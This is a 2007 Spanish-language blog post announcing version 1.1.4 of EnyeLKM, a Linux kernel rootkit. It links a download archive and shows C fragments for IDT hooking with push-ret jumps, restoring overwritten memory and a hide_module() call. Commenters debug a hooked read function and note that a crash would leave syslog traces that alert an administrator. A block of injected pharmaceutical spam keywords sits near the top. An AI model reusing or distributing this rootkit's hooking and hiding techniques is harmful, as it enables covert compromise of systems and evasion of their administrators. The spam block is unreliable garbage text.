« EnyeLKM 1.1.3
EnyeLKM 1.1.4-fix »

EnyeLKM 1.1.4

Language / Lenguaje:
Testerone Hgh Medical Atrovent Anxiety Byetta Lisinopril Interaction Migraine And Depakote Flatulence Glucophage La Piazza Allegra Hamilton Ontario Is There Ibuprofen In Cafergot Hoodia Gardonia Effect Blood Pressure Headaches And Prozac Next Day Cialis Prozac Causes Parkinsons Disease Imitrex And Alcohol Lipitor Versus Levostatin Fda Approval For Risperdal 1993 Tramadol Acet D Cup Breast Augmentation Faxine Effexor Dysfunction Erectile Levitra Femara As Fertility Drug Bacteria Producing Chitosan Using Crabshell Ultram End Of Dose Prednisone And Hyperglycemia Erectile Dysfunction And Lipitor Viagra Coverage Ca Dilantin Levels In Blood Interactions Symptoms Of Celexa And Biaxin Colchicine Overdose Effects Elavil Used In Suicide Fosamax Joint And Muscle Pain Zoloft Sertraline Tablets Getting Off Effexor Xr Cialis Buy It Online Huge Discount Clomid Affects Hcg Levels Aciphex Directions Reasons Why Viagra Would Be Ineffective Medical Research For Levitra Relafen Neuropathy Norvasc And Peripheral Edema Levoquin And Coumadin What To Eat When Taking Coumadin Prolong Use Of Lexapro Hoodia And Medicine Interactions Ultram Tramadol Hci Tablet Zocor Cost Per Pill Effects Of Levitra On Women Viagra Sale Cheap Colchicine Gout Colchicine Treatment Gout Actos Takeda Pharm Lasix Symtoms Lioresal Prescribing Information

http://www.fr33project.org/projects/enyelkm-1.1.4.rar

Nuevo módulo: restore_memory.c, el módulo es capaz de guardar la memoria sobreescrita por los
saltos para luego restaurarlos cuando se descargue el módulo (antes no era posible descargarlo).

create_push_ret( & push_ret, (unsigned long) new_idt );
save_memory( (unsigned long) p, & backup_memory );
write_push_ret( ( void *) p, & push_ret );

Función cleanup del LKM:
restore_memory( & backup_memory );

__dev_remove_pack( & my_pkt );

/* dejar terminar procesos que estan ‘leyendo’ */
while ( read_activo != 0 || can_unload_lkm != 1 )
schedule();

Modificación en idt:
void new_idt( void )
{
can_unload_lkm = 0;
….
can_unload_lkm = 1;

JmPushRet( after_call )

El semáforo se usa por si hay ejecutandose alguna llamada al sistema redireccionada.

PD: Para probarlo comentar la función hide_module().

Posted by David Reguera Garcia

This entry was posted on Friday, March 23rd, 2007 at 4:09 pm and is filed under release. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

3 Responses to “EnyeLKM 1.1.4”

  1. RaiSe Says:
    March 23rd, 2007 at 5:21 pm

    Language / Lenguaje: English / Inglés

    Nass. Como ya te comenté por msn hay una pifia mia en el hacked_read(), el semaforo de read_activo no puede ser uno binario, como diria mi profesor de SO hay un problema de exclusion mutua clarisimo XD. read_activo tiene que ser un contador inicializado a 0, cuando un proceso entra en un read lo incrementa, y al salir lo decrementa, como está ahora un proceso puede estar dentro de su read bloqueado y read_activo a 0 tranquilamente. A ser posible read_activo que sea mejor de tipo atomic_t para que evite problemas de exclusion mutua y para que quede + chulo :). Por lo demas lo de carga/descarga va perfect, solo falla que un proceso puede estar bloqueado dentro de nuestra hacked_read() y con read_activo a 0, el modulo se descarga y al dar a intro (bash) por ejemplo se desbloquea, se restaura su eip que estaba en nuestra hacked_read() que ya no existe, da un error de falta de pagina y peta el proceso dejando una hilera de mensajes en el syslog que llamaria la atencion al administrador mas empanao jeje. Un saludo ;).

  2. David Reguera Garcia Says:
    March 23rd, 2007 at 9:15 pm

    Language / Lenguaje: English / Inglés

    Bueno de todas maneras, la descarga es solo para ti y para mi, a priori no se suele descargar el LKM, de todas formas, puedes pastear tu hacked_read? o lo implemento yo? :?

  3. David Reguera Garcia Says:
    March 24th, 2007 at 8:08 am

    Language / Lenguaje: English / Inglés

    Ya lo he implementado yo :-), echa un ojo al 1.1.4-fix :-).

Leave a Reply

You must be logged in to post a comment.